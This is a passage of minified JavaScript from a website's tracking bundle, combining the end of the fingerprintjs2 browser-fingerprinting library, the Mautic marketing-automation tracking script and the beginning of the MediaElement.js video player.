e,t=navigator.userAgent.toLowerCase(),i=navigator.productSub;if(e=t.indexOf("firefox")>=0?"Firefox":t.indexOf("opera")>=0||t.indexOf("opr")>=0?"Opera":t.indexOf("chrome")>=0?"Chrome":t.indexOf("safari")>=0?"Safari":t.indexOf("trident")>=0?"Internet Explorer":"Other",("Chrome"===e||"Safari"===e||"Opera"===e)&&"20030107"!==i)return!0;var a=eval.toString().length;if(37===a&&"Safari"!==e&&"Firefox"!==e&&"Other"!==e)return!0;if(39===a&&"Internet Explorer"!==e&&"Other"!==e)return!0;if(33===a&&"Chrome"!==e&&"Opera"!==e&&"Other"!==e)return!0;var r;try{throw"a"}catch(n){try{n.toSource(),r=!0}catch(o){r=!1}}return!(!r||"Firefox"===e||"Other"===e)},isCanvasSupported:function(){var e=document.createElement("canvas");return!(!e.getContext||!e.getContext("2d"))},isWebGlSupported:function(){if(!this.isCanvasSupported())return!1;var e,t=document.createElement("canvas");try{e=t.getContext&&(t.getContext("webgl")||t.getContext("experimental-webgl"))}catch(i){e=!1}return!!window.WebGLRenderingContext&&!!e},isIE:function(){return"Microsoft Internet Explorer"===navigator.appName||!("Netscape"!==navigator.appName||!/Trident/.test(navigator.userAgent))},hasSwfObjectLoaded:function(){return"undefined"!=typeof window.swfobject},hasMinFlashInstalled:function(){return swfobject.hasFlashPlayerVersion("9.0.0")},addFlashDivNode:function(){var e=document.createElement("div");e.setAttribute("id",this.options.swfContainerId),document.body.appendChild(e)},loadSwfAndDetectFonts:function(e){var t="___fp_swf_loaded";window[t]=function(t){e(t)};var i=this.options.swfContainerId;this.addFlashDivNode();var a={onReady:t},r={allowScriptAccess:"always",menu:"false"};swfobject.embedSWF(this.options.swfPath,i,"1","1","9.0.0",!1,a,r,{})},getWebglCanvas:function(){var e=document.createElement("canvas"),t=null;try{t=e.getContext("webgl")||e.getContext("experimental-webgl")}catch(i){}return t||(t=null),t},each:function(e,t,i){if(null!==e)if(this.nativeForEach&&e.forEach===this.nativeForEach)e.forEach(t,i);else if(e.length===+e.length){for(var a=0,r=e.length;a<r;a++)if(t.call(i,e[a],a,e)==={})return}else for(var n in e)if(e.hasOwnProperty(n)&&t.call(i,e[n],n,e)==={})return},map:function(e,t,i){var a=[];return null==e?a:this.nativeMap&&e.map===this.nativeMap?e.map(t,i):(this.each(e,function(e,r,n){a[a.length]=t.call(i,e,r,n)}),a)},x64Add:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var i=[0,0,0,0];return i[3]+=e[3]+t[3],i[2]+=i[3]>>>16,i[3]&=65535,i[2]+=e[2]+t[2],i[1]+=i[2]>>>16,i[2]&=65535,i[1]+=e[1]+t[1],i[0]+=i[1]>>>16,i[1]&=65535,i[0]+=e[0]+t[0],i[0]&=65535,[i[0]<<16|i[1],i[2]<<16|i[3]]},x64Multiply:function(e,t){e=[e[0]>>>16,65535&e[0],e[1]>>>16,65535&e[1]],t=[t[0]>>>16,65535&t[0],t[1]>>>16,65535&t[1]];var i=[0,0,0,0];return i[3]+=e[3]*t[3],i[2]+=i[3]>>>16,i[3]&=65535,i[2]+=e[2]*t[3],i[1]+=i[2]>>>16,i[2]&=65535,i[2]+=e[3]*t[2],i[1]+=i[2]>>>16,i[2]&=65535,i[1]+=e[1]*t[3],i[0]+=i[1]>>>16,i[1]&=65535,i[1]+=e[2]*t[2],i[0]+=i[1]>>>16,i[1]&=65535,i[1]+=e[3]*t[1],i[0]+=i[1]>>>16,i[1]&=65535,i[0]+=e[0]*t[3]+e[1]*t[2]+e[2]*t[1]+e[3]*t[0],i[0]&=65535,[i[0]<<16|i[1],i[2]<<16|i[3]]},x64Rotl:function(e,t){return t%=64,32===t?[e[1],e[0]]:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t|e[0]>>>32-t]:(t-=32,[e[1]<<t|e[0]>>>32-t,e[0]<<t|e[1]>>>32-t])},x64LeftShift:function(e,t){return t%=64,0===t?e:t<32?[e[0]<<t|e[1]>>>32-t,e[1]<<t]:[e[1]<<t-32,0]},x64Xor:function(e,t){return[e[0]^t[0],e[1]^t[1]]},x64Fmix:function(e){return e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[4283543511,3981806797]),e=this.x64Xor(e,[0,e[0]>>>1]),e=this.x64Multiply(e,[3301882366,444984403]),e=this.x64Xor(e,[0,e[0]>>>1])},x64hash128:function(e,t){e=e||"",t=t||0;for(var i=e.length%16,a=e.length-i,r=[0,t],n=[0,t],o=[0,0],s=[0,0],l=[2277735313,289559509],h=[1291169091,658871167],u=0;u<a;u+=16)o=[255&e.charCodeAt(u+4)|(255&e.charCodeAt(u+5))<<8|(255&e.charCodeAt(u+6))<<16|(255&e.charCodeAt(u+7))<<24,255&e.charCodeAt(u)|(255&e.charCodeAt(u+1))<<8|(255&e.charCodeAt(u+2))<<16|(255&e.charCodeAt(u+3))<<24],s=[255&e.charCodeAt(u+12)|(255&e.charCodeAt(u+13))<<8|(255&e.charCodeAt(u+14))<<16|(255&e.charCodeAt(u+15))<<24,255&e.charCodeAt(u+8)|(255&e.charCodeAt(u+9))<<8|(255&e.charCodeAt(u+10))<<16|(255&e.charCodeAt(u+11))<<24],o=this.x64Multiply(o,l),o=this.x64Rotl(o,31),o=this.x64Multiply(o,h),r=this.x64Xor(r,o),r=this.x64Rotl(r,27),r=this.x64Add(r,n),r=this.x64Add(this.x64Multiply(r,[0,5]),[0,1390208809]),s=this.x64Multiply(s,h),s=this.x64Rotl(s,33),s=this.x64Multiply(s,l),n=this.x64Xor(n,s),n=this.x64Rotl(n,31),n=this.x64Add(n,r),n=this.x64Add(this.x64Multiply(n,[0,5]),[0,944331445]);switch(o=[0,0],s=[0,0],i){case 15:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+14)],48));case 14:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+13)],40));case 13:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+12)],32));case 12:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+11)],24));case 11:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+10)],16));case 10:s=this.x64Xor(s,this.x64LeftShift([0,e.charCodeAt(u+9)],8));case 9:s=this.x64Xor(s,[0,e.charCodeAt(u+8)]),s=this.x64Multiply(s,h),s=this.x64Rotl(s,33),s=this.x64Multiply(s,l),n=this.x64Xor(n,s);case 8:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+7)],56));case 7:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+6)],48));case 6:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+5)],40));case 5:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+4)],32));case 4:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+3)],24));case 3:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+2)],16));case 2:o=this.x64Xor(o,this.x64LeftShift([0,e.charCodeAt(u+1)],8));case 1:o=this.x64Xor(o,[0,e.charCodeAt(u)]),o=this.x64Multiply(o,l),o=this.x64Rotl(o,31),o=this.x64Multiply(o,h),r=this.x64Xor(r,o)}return r=this.x64Xor(r,[0,e.length]),n=this.x64Xor(n,[0,e.length]),r=this.x64Add(r,n),n=this.x64Add(n,r),r=this.x64Fmix(r),n=this.x64Fmix(n),r=this.x64Add(r,n),n=this.x64Add(n,r),("00000000"+(r[0]>>>0).toString(16)).slice(-8)+("00000000"+(r[1]>>>0).toString(16)).slice(-8)+("00000000"+(n[0]>>>0).toString(16)).slice(-8)+("00000000"+(n[1]>>>0).toString(16)).slice(-8)}},e.VERSION="1.4.4",e});(function(){if(typeof window.CustomEvent==="function")return false;function CustomEvent(event,params){params=params||{bubbles:false,cancelable:false,detail:undefined};var evt=document.createEvent('CustomEvent');evt.initCustomEvent(event,params.bubbles,params.cancelable,params.detail);return evt;} CustomEvent.prototype=window.Event.prototype;window.CustomEvent=CustomEvent;})();var MauticJS=MauticJS||{};MauticJS.serialize=function(obj){if('string'==typeof obj){return obj;} return Object.keys(obj).map(function(key){return encodeURIComponent(key)+'='+encodeURIComponent(obj[key]);}).join('&');};MauticJS.documentReady=function(f){/in/.test(document.readyState)?setTimeout(function(){MauticJS.documentReady(f)},9):f();};MauticJS.iterateCollection=function(collection){return function(f){for(var i=0;collection[i];i++){f(collection[i],i);}};};MauticJS.log=function(){var log={};log.history=log.history||[];log.history.push(arguments);if(window.console){console.log(Array.prototype.slice.call(arguments));}};MauticJS.setCookie=function(name,value){document.cookie=name+"="+value+";";};MauticJS.createCORSRequest=function(method,url){var xhr=new XMLHttpRequest();method=method.toUpperCase();if("withCredentials"in xhr){xhr.open(method,url,true);}else if(typeof XDomainRequest!="undefined"){xhr=new XDomainRequest();xhr.open(method,url);} return xhr;};MauticJS.CORSRequestsAllowed=true;MauticJS.makeCORSRequest=function(method,url,data,callbackSuccess,callbackError){data=MauticJS.appendTrackedContact(data);var query=MauticJS.serialize(data);if(method.toUpperCase()==='GET'){url=url+'?'+query;var query='';} var xhr=MauticJS.createCORSRequest(method,url);var response;callbackSuccess=callbackSuccess||function(response,xhr){};callbackError=callbackError||function(response,xhr){};if(!xhr){MauticJS.log('MauticJS.debug: Could not create an XMLHttpRequest instance.');return false;} if(!MauticJS.CORSRequestsAllowed){callbackError({},xhr);return false;} xhr.onreadystatechange=function(e){if(xhr.readyState===XMLHttpRequest.DONE){response=MauticJS.parseTextToJSON(xhr.responseText);if(xhr.status===200){callbackSuccess(response,xhr);}else{callbackError(response,xhr);if(xhr.status===XMLHttpRequest.UNSENT){MauticJS.CORSRequestsAllowed=false;}}}};if(typeof xhr.setRequestHeader!=="undefined"){if(method.toUpperCase()==='POST'){xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');} xhr.setRequestHeader('X-Requested-With','XMLHttpRequest');xhr.withCredentials=true;} xhr.send(query);};MauticJS.parseTextToJSON=function(maybeJSON){var response;try{response=JSON.parse(maybeJSON);}catch(error){response=maybeJSON;} return response;};MauticJS.insertScript=function(scriptUrl){var scriptsInHead=document.getElementsByTagName('head')[0].getElementsByTagName('script');var lastScript=scriptsInHead[scriptsInHead.length-1];var scriptTag=document.createElement('script');scriptTag.async=1;scriptTag.src=scriptUrl;if(lastScript){lastScript.parentNode.insertBefore(scriptTag,lastScript);}else{document.getElementsByTagName('head')[0].appendChild(scriptTag);}};MauticJS.insertStyle=function(styleUrl){var linksInHead=document.getElementsByTagName('head')[0].getElementsByTagName('link');var lastLink=linksInHead[linksInHead.length-1];var linkTag=document.createElement('link');linkTag.rel="stylesheet";linkTag.type="text/css";linkTag.href=styleUrl;if(lastLink){lastLink.parentNode.insertBefore(linkTag,lastLink.nextSibling);}else{document.getElementsByTagName('head')[0].appendChild(linkTag);}};MauticJS.guid=function(){function s4(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1);} return s4()+s4()+'-'+s4()+'-'+s4()+'-'+s4()+'-'+s4()+s4()+s4();};MauticJS.dispatchEvent=function(name,detail){var event=new CustomEvent(name,{detail:detail});document.dispatchEvent(event);};function s4(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1);} MauticJS.mtcSet=false;MauticJS.appendTrackedContact=function(data){if(window.localStorage){if(mtcId=localStorage.getItem('mtc_id')){data['mautic_device_id']=localStorage.getItem('mautic_device_id');}} return data;};MauticJS.getTrackedContact=function(){if(MauticJS.mtcSet){return;} MauticJS.makeCORSRequest('GET',MauticJS.contactIdUrl,{},function(response,xhr){MauticJS.setTrackedContact(response);});};MauticJS.setTrackedContact=function(response){if(response.id){MauticJS.setCookie('mtc_id',response.id);MauticJS.setCookie('mtc_sid',response.sid);MauticJS.setCookie('mautic_device_id',response.device_id);MauticJS.mtcSet=true;try{localStorage.setItem('mtc_id',response.id);localStorage.setItem('mtc_sid',response.sid);localStorage.setItem('mautic_device_id',response.device_id);}catch(e){console.warn('Browser does not allow storing in local storage');}}};MauticJS.postEventDeliveryQueue=[];MauticJS.firstDeliveryMade=false;MauticJS.onFirstEventDelivery=function(f){MauticJS.postEventDeliveryQueue.push(f);};MauticJS.preEventDeliveryQueue=[];MauticJS.beforeFirstDeliveryMade=false;MauticJS.beforeFirstEventDelivery=function(f){MauticJS.preEventDeliveryQueue.push(f);};document.addEventListener('mauticPageEventDelivered',function(e){var detail=e.detail;var isImage=detail.image;if(isImage&&!MauticJS.mtcSet){MauticJS.getTrackedContact();}else if(detail.response&&detail.response.id){MauticJS.setTrackedContact(detail.response);} if(!isImage&&typeof detail.event[3]==='object'&&typeof detail.event[3].onload==='function'){detail.event[3].onload(detail)} if(!MauticJS.firstDeliveryMade){MauticJS.firstDeliveryMade=true;for(var i=0;i<MauticJS.postEventDeliveryQueue.length;i++){if(typeof MauticJS.postEventDeliveryQueue[i]==='function'){MauticJS.postEventDeliveryQueue[i](detail);} delete MauticJS.postEventDeliveryQueue[i];}}});MauticJS.pixelLoaded=function(f){MauticJS.onFirstEventDelivery(f);} MauticJS.checkForTrackingPixel=function(){if(!/in/.test(document.readyState)){setTimeout(function(){MauticJS.checkForTrackingPixel()},9)}else{var maxChecks=3000;var checkPixel=setInterval(function(){if(maxChecks>0&&!MauticJS.isPixelLoaded(true)){maxChecks--;return;} clearInterval(checkPixel);if(maxChecks>0){var params={},hash;var hashes=MauticJS.trackingPixel.src.slice(MauticJS.trackingPixel.src.indexOf('?')+1).split('&');for(var i=0;i<hashes.length;i++){hash=hashes[i].split('=');params[hash[0]]=hash[1];} MauticJS.dispatchEvent('mauticPageEventDelivered',{'event':['send','pageview',params],'params':params,'image':true});}},1);}} MauticJS.checkForTrackingPixel();MauticJS.isPixelLoaded=function(domOnly){if(typeof domOnly=='undefined'){domOnly=false;} if(typeof MauticJS.trackingPixel==='undefined'){MauticJS.trackingPixel=null;var imgs=Array.prototype.slice.apply(document.getElementsByTagName('img'));for(var i=0;i<imgs.length;i++){if(imgs[i].src.indexOf('mtracking.gif')!==-1){MauticJS.trackingPixel=imgs[i];break;}}}else if(domOnly){return false;} if(MauticJS.trackingPixel&&MauticJS.trackingPixel.complete&&MauticJS.trackingPixel.naturalWidth!==0){return true;} return false;};if(typeof window[window.MauticTrackingObject]!=='undefined'){MauticJS.input=window[window.MauticTrackingObject];if(typeof MauticJS.input.q==='undefined'){MauticJS.input.q=[];} MauticJS.inputQueue=MauticJS.input.q;if(!MauticJS.inputQueue.hasOwnProperty('push')){Object.defineProperty(MauticJS.inputQueue,'push',{configurable:false,enumerable:false,writable:false,value:function(){for(var i=0,n=this.length,l=arguments.length;i<l;i++,n++){MauticJS.dispatchEvent('eventAddedToMauticQueue',arguments[i]);} return n;}});} MauticJS.getInput=function(task,type){var matches=[];if(typeof MauticJS.inputQueue!=='undefined'&&MauticJS.inputQueue.length){for(var i in MauticJS.inputQueue){if(MauticJS.inputQueue[i][0]===task&&MauticJS.inputQueue[i][1]===type){matches.push(MauticJS.inputQueue[i]);}}} return matches;}}MauticJS.initGatedVideo=function(){MauticJS.videoElements=MauticJS.videoElements||document.getElementsByTagName('video');if(!MauticJS.videoElements.length){MauticJS.videoElements=null;return;} MauticJS.mauticInsertedScripts=MauticJS.mauticInsertedScripts||{};if("undefined"==typeof jQuery&&"undefined"==typeof MauticJS.mauticInsertedScripts.jQuery){MauticJS.insertScript('https://ma.hatcocorp.com/app/bundles/CoreBundle/Assets/js/libraries/2.jquery.js');MauticJS.mauticInsertedScripts.jQuery=true;} if("undefined"==typeof Froogaloop&&"undefined"==typeof MauticJS.mauticInsertedScripts.Froogaloop){MauticJS.insertScript('https://f.vimeocdn.com/js/froogaloop2.min.js');MauticJS.mauticInsertedScripts.Froogaloop=true;} if("undefined"==typeof jQuery||"undefined"==typeof Froogaloop){MauticJS.gatedVideoTimeoutID=window.setTimeout(MauticJS.initGatedVideo,1000);}else{MauticJS.insertStyle('https://ma.hatcocorp.com/media/css/mediaelementplayer.min.css'); /*! * * MediaElement.js * HTML5 <video> and <audio> shim and player * http://mediaelementjs.com/ * * Creates a JavaScript object that mimics HTML5 MediaElement API * for browsers that don't understand HTML5 or can't play the provided codec * Can play MP4 (H.264), Ogg, WebM, FLV, WMV, WMA, ACC, and MP3 * * Copyright 2010-2014, John Dyer (http://j.hn) * License: MIT * */ var mejs=mejs||{};mejs.version="2.21.2",mejs.meIndex=0,mejs.plugins={silverlight:[{version:[3,0],types:["video/mp4","video/m4v","video/mov","video/wmv","audio/wma","audio/m4a","audio/mp3","audio/wav","audio/mpeg"]}],flash:[{version:[9,0,124],types:["video/mp4","video/m4v","video/mov","video/flv","video/rtmp","video/x-flv","audio/flv","audio/x-flv","audio/mp3","audio/m4a","audio/mpeg","video/dailymotion","video/x-dailymotion","application/x-mpegURL"]}],youtube:[{version:null,types:["video/youtube","video/x-youtube","audio/youtube","audio/x-youtube"]}],vimeo:[{version:null,types:["video/vimeo","video/x-vimeo"]}]},mejs.Utility={encodeUrl:function(a){return encodeURIComponent(a)},escapeHTML:function(a){return a.toString().split("&").join("&amp;").split("<").join("&lt;").split('"').join("&quot;")},absolutizeUrl:function(a){var b=document.createElement("div");return b.innerHTML='<a href="'+this.escapeHTML(a)+'">x</a>',b.firstChild.href},getScriptPath:function(a){for(var b,c,d,e,f,g,h=0,i="",j="",k=document.getElementsByTagName("script"),l=k.length,m=a.length;l>h;h++){for(e=k[h].src,c=e.lastIndexOf("/"),c>-1?(g=e.substring(c+1),f=e.substring(0,c+1)):(g=e,f=""),b=0;m>b;b++)if(j=a[b],d=g.indexOf(j),d>-1){i=f;break}if(""!==i)break}return i},calculateTimeFormat:function(a,b,c){0>a&&(a=0),"undefined"==typeof c&&(c=25);var d=b.timeFormat,e=d[0],f=d[1]==d[0],g=f?2:1,h=":",i=Math.floor(a/3600)%24,j=Math.floor(a/60)%60,k=Math.floor(a%60),l=Math.floor((a%1*c).toFixed(3)),m=[[l,"f"],[k,"s"],[j,"m"],[i,"h"]];d.length<g&&(h=d[g]);for(var n=!1,o=0,p=m.length;p>o;o++)if(-1!==d.indexOf(m[o][1]))n=!0;else if(n){for(var q=!1,r=o;p>r;r++)if(m[r][0]>0){q=!0;break}if(!q)break;f||(d=e+d),d=m[o][1]+h+d,f&&(d=m[o][1]+d),e=m[o][1]}b.currentTimeFormat=d},twoDigitsString:function(a){return 10>a?"0"+a:String(a)},secondsToTimeCode:function(a,b){if(0>a&&(a=0),"object"!=typeof b){var c="m:ss";c=arguments[1]?"hh:mm:ss":c,c=arguments[2]?c+":ff":c,b={currentTimeFormat:c,framesPerSecond:arguments[3]||25}}var d=b.framesPerSecond;"undefined"==typeof d&&(d=25);var c=b.currentTimeFormat,e=Math.floor(a/3600)%24,f=Math.floor(a/60)%60,g=Math.floor(a%60),h=Math.floor((a%1*d).toFixed(3));lis=[[h,"f"],[g,"s"],[f,"m"],[e,"h"]];var j=c;for(i=0,len=lis.length;i<len;i++)j=j.replace(lis[i][1]+lis[i][1],this.twoDigitsString(lis[i][0])),j=j.replace(lis[i][1],lis[i][0]);return j},timeCodeToSeconds:function(a,b,c,d){"undefined"==typeof c?c=!1:"undefined"==typeof d&&(d=25);var e=a.split(":"),f=parseInt(e[0],10),g=parseInt(e[1],10),h=parseInt(e[2],10),i=0,j=0;return c&&(i=parseInt(e[3])/d),j=3600*f+60*g+h+i},convertSMPTEtoSeconds:function(a){if("string"!=typeof a)return!1;a=a.replace(",",".");var b=0,c=-1!=a.indexOf(".")?a.split(".")[1].length:0,d=1;a=a.split(":").reverse();for(var e=0;e<a.length;e++)d=1,e>0&&(d=Math.pow(60,e)),b+=Number(a[e])*d;return Number(b.toFixed(c))},removeSwf:function(a){var b=document.getElementById(a);b&&/object|embed/i.test(b.nodeName)&&(mejs.MediaFeatures.isIE?(b.style.display="none",function(){4==b.readyState?mejs.Utility.removeObjectInIE(a):setTimeout(arguments.callee,10)}()):b.parentNode.removeChild(b))},removeObjectInIE:function(a){var b=document.getElementById(a);if(b){for(var c in b)"function"==typeof b[c]&&(b[c]=null);b.parentNode.removeChild(b)}},determineScheme:function(a){return a&&-1!=a.indexOf("://")?a.substr(0,a.indexOf("://")+3):"//"}},mejs.PluginDetector={hasPluginVersion:function(a,b){var c=this.plugins[a];return b[1]=b[1]||0,b[2]=b[2]||0,c[0]>b[0]||c[0]==b[0]&&c[1]>b[1]||c[0]==b[0]&&c[1]==b[1]&&c[2]>=b[2]?!0:!1},nav:window.navigator,ua:window.navigator.userAgent.toLowerCase(),plugins:[],addPlugin:function(a,b,c,d,e){this.plugins[a]=this.detectPlugin(b,c,d,e)},detectPlugin:function(a,b,c,d){var e,f,g,h=[0,0,0];if("undefined"!=typeof this.nav.plugins&&"object"==typeof this.nav.plugins[a]){if(e=this.nav.plugins[a].description,e&&("undefined"==typeof this.nav.mimeTypes||!this.nav.mimeTypes[b]||this.nav.mimeTypes[b].enabledPlugin))for(h=e.replace(a,"").replace(/^\s+/,"").replace(/\sr/gi,".").split("."),f=0;f<h.length;f++)h[f]=parseInt(h[f].match(/\d+/),10)}else if("undefined"!=typeof window.ActiveXObject)try{g=new ActiveXObject(c),g&&(h=d(g))}catch(i){}return h}},mejs.PluginDetector.addPlugin("flash","Shockwave Flash","application/x-shockwave-flash","ShockwaveFlash.ShockwaveFlash",function(a){var b=[],c=a.GetVariable("$version");return c&&(c=c.split(" ")[1].split(","),b=[parseInt(c[0],10),parseInt(c[1],10),parseInt(c[2],10)]),b}),mejs.PluginDetector.addPlugin("silverlight","Silverlight Plug-In","application/x-silverlight-2","AgControl.AgControl",function(a){var b=[0,0,0,0],c=function(a,b,c,d){for(;a.isVersionSupported(b[0]+"."+b[1]+"."+b[2]+"."+b[3]);)b[c]+=d;b[c]-=d};return c(a,b,0,1),c(a,b,1,1),c(a,b,2,1e4),c(a,b,2,1e3),c(a,b,2,100),c(a,b,2,10),c(a,b,2,1),c(a,b,3,1),b}),mejs.MediaFeatures={init:function(){var a,b,c=this,d=document,e=mejs.PluginDetector.nav,f=mejs.PluginDetector.ua.toLowerCase(),g=["source","track","audio","video"];c.isiPad=null!==f.match(/ipad/i),c.isiPhone=null!==f.match(/iphone/i),c.isiOS=c.isiPhone||c.isiPad,c.isAndroid=null!==f.match(/android/i),c.isBustedAndroid=null!==f.match(/android 2\.[12]/),c.isBustedNativeHTTPS="https:"===location.protocol&&(null!==f.match(/android [12]\./)||null!==f.match(/macintosh.* version.* safari/)),c.isIE=-1!=e.appName.toLowerCase().indexOf("microsoft")||null!==e.appName.toLowerCase().match(/trident/gi),c.isChrome=null!==f.match(/chrome/gi),c.isChromium=null!==f.match(/chromium/gi),c.isFirefox=null!==f.match(/firefox/gi),c.isWebkit=null!==f.match(/webkit/gi),c.isGecko=null!==f.match(/gecko/gi)&&!c.isWebkit&&!c.isIE,c.isOpera=null!==f.match(/opera/gi),c.hasTouch="ontouchstart"in window,c.svgAsImg=!!document.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image","1.1");for(a=0;a<g.length;a++)b=document.createElement(g[a]);c.supportsMediaTag="undefined"!=typeof b.canPlayType||c.isBustedAndroid;try{b.canPlayType("video/mp4")}catch(h){c.supportsMediaTag=!1}c.supportsPointerEvents=function(){var a,b=document.createElement("x"),c=document.documentElement,d=window.getComputedStyle;return"pointerEvents"in b.style?(b.style.pointerEvents="auto",b.style.pointerEvents="x",c.appendChild(b),a=d&&"auto"===d(b,"").pointerEvents,c.removeChild(b),!!a):!1}(),c.hasFirefoxPluginMovingProblem=!1,c.hasiOSFullScreen="undefined"!=typeof b.webkitEnterFullscreen,c.hasNativeFullscreen="undefined"!=typeof b.requestFullscreen,c.hasWebkitNativeFullScreen="undefined"!=typeof b.webkitRequestFullScreen,c.hasMozNativeFullScreen="undefined"!=typeof b.mozRequestFullScreen,c.hasMsNativeFullScreen="undefined"!=typeof b.msRequestFullscreen,c.hasTrueNativeFullScreen=c.hasWebkitNativeFullScreen||c.hasMozNativeFullScreen||c.hasMsNativeFullScreen,c.nativeFullScreenEnabled=c.hasTrueNativeFullScreen,c.hasMozNativeFullScreen?c.nativeFullScreenEnabled=document.mozFullScreenEnabled:c.hasMsNativeFullScreen&&(c.nativeFullScreenEnabled=document.msFullscreenEnabled),c.isChrome&&(c.hasiOSFullScreen=!1),c.hasTrueNativeFullScreen&&(c.fullScreenEventName="",c.hasWebkitNativeFullScreen?c.fullScreenEventName="webkitfullscreenchange":c.hasMozNativeFullScreen?c.fullScreenEventName="mozfullscreenchange":c.hasMsNativeFullScreen&&(c.fullScreenEventName="MSFullscreenChange"),c.isFullScreen=function(){return c.hasMozNativeFullScreen?d.mozFullScreen:c.hasWebkitNativeFullScreen?d.webkitIsFullScreen:c.hasMsNativeFullScreen?null!==d.msFullscreenElement:void 0},c.requestFullScreen=function(a){c.hasWebkitNativeFullScreen?a.webkitRequestFullScreen():c.hasMozNativeFullScreen?a.mozRequestFullScreen():c.hasMsNativeFullScreen&&a.msRequestFullscreen()},c.cancelFullScreen=function(){c.hasWebkitNativeFullScreen?document.webkitCancelFullScreen():c.hasMozNativeFullScreen?document.mozCancelFullScreen():c.hasMsNativeFullScreen&&document.msExitFullscreen()}),c.hasiOSFullScreen&&f.match(/mac os x 10_5/i)&&(c.hasNativeFullScreen=!1,c.hasiOSFullScreen=!1)}},mejs.MediaFeatures.init(),mejs.HtmlMediaElement={pluginType:"native",isFullScreen:!1,setCurrentTime:function(a){this.currentTime=a},setMuted:function(a){this.muted=a},setVolume:function(a){this.volume=a},stop:function(){this.pause()},setSrc:function(a){for(var b=this.getElementsByTagName("source");b.length>0;)this.removeChild(b[0]);if("string"==typeof a)this.src=a;else{var c,d;for(c=0;c<a.length;c++)if(d=a[c],this.canPlayType(d.type)){this.src=d.src;break}}},setVideoSize:function(a,b){this.width=a,this.height=b}},mejs.PluginMediaElement=function(a,b,c){this.id=a,this.pluginType=b,this.src=c,this.events={},this.attributes={}},mejs.PluginMediaElement.prototype={pluginElement:null,pluginType:"",isFullScreen:!1,playbackRate:-1,defaultPlaybackRate:-1,seekable:[],played:[],paused:!0,ended:!1,seeking:!1,duration:0,error:null,tagName:"",muted:!1,volume:1,currentTime:0,play:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.playVideo():this.pluginApi.playMedia(),this.paused=!1)},load:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType||this.pluginApi.loadMedia(),this.paused=!1)},pause:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.pauseVideo():this.pluginApi.pauseMedia(),this.paused=!0)},stop:function(){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.stopVideo():this.pluginApi.stopMedia(),this.paused=!0)},canPlayType:function(a){var b,c,d,e=mejs.plugins[this.pluginType];for(b=0;b<e.length;b++)if(d=e[b],mejs.PluginDetector.hasPluginVersion(this.pluginType,d.version))for(c=0;c<d.types.length;c++)if(a==d.types[c])return"probably";return""},positionFullscreenButton:function(a,b,c){null!=this.pluginApi&&this.pluginApi.positionFullscreenButton&&this.pluginApi.positionFullscreenButton(Math.floor(a),Math.floor(b),c)},hideFullscreenButton:function(){null!=this.pluginApi&&this.pluginApi.hideFullscreenButton&&this.pluginApi.hideFullscreenButton()},setSrc:function(a){if("string"==typeof a)this.pluginApi.setSrc(mejs.Utility.absolutizeUrl(a)),this.src=mejs.Utility.absolutizeUrl(a);else{var b,c;for(b=0;b<a.length;b++)if(c=a[b],this.canPlayType(c.type)){this.pluginApi.setSrc(mejs.Utility.absolutizeUrl(c.src)),this.src=mejs.Utility.absolutizeUrl(c.src);break}}},setCurrentTime:function(a){null!=this.pluginApi&&("youtube"==this.pluginType||"vimeo"==this.pluginType?this.pluginApi.seekTo(a):this.pluginApi.setCurrentTime(a),this.currentTime=a)},setVolume:function(a){null!=this.pluginApi&&("youtube"==this.pluginType?this.pluginApi.setVolume(100*a):this.pluginApi.setVolume(a),this.volume=a)},setMuted:function(a){null!=this.pluginApi&&("youtube"==this.pluginType?(a?this.pluginApi.mute():this.pluginApi.unMute(),this.muted=a,this.dispatchEvent({type:"volumechange"})):this.pluginApi.setMuted(a),this.muted=a)},setVideoSize:function(a,b){this.pluginElement&&this.pluginElement.style&&(this.pluginElement.style.width=a+"px",this.pluginElement.style.height=b+"px"),null!=this.pluginApi&&this.pluginApi.setVideoSize&&this.pluginApi.setVideoSize(a,b)},setFullscreen:function(a){null!=this.pluginApi&&this.pluginApi.setFullscreen&&this.pluginApi.setFullscreen(a)},enterFullScreen:function(){null!=this.pluginApi&&this.pluginApi.setFullscreen&&this.setFullscreen(!0)},exitFullScreen:function(){null!=this.pluginApi&&this.pluginApi.setFullscreen&&this.setFullscreen(!1)},addEventListener:function(a,b,c){this.events[a]=this.events[a]||[],this.events[a].push(b)},removeEventListener:function(a,b){if(!a)return this.events={},!0;var c=this.events[a];if(!c)return!0;if(!b)return this.events[a]=[],!0;for(var d=0;d<c.length;d++)if(c[d]===b)return this.events[a].splice(d,1),!0;return!1},dispatchEvent:function(a){var b,c=this.events[a.type];if(c)for(b=0;b<c.length;b++)c[b].apply(this,[a])},hasAttribute:function(a){return a in this.attributes},removeAttribute:function(a){delete this.attributes[a]},getAttribute:function(a){return 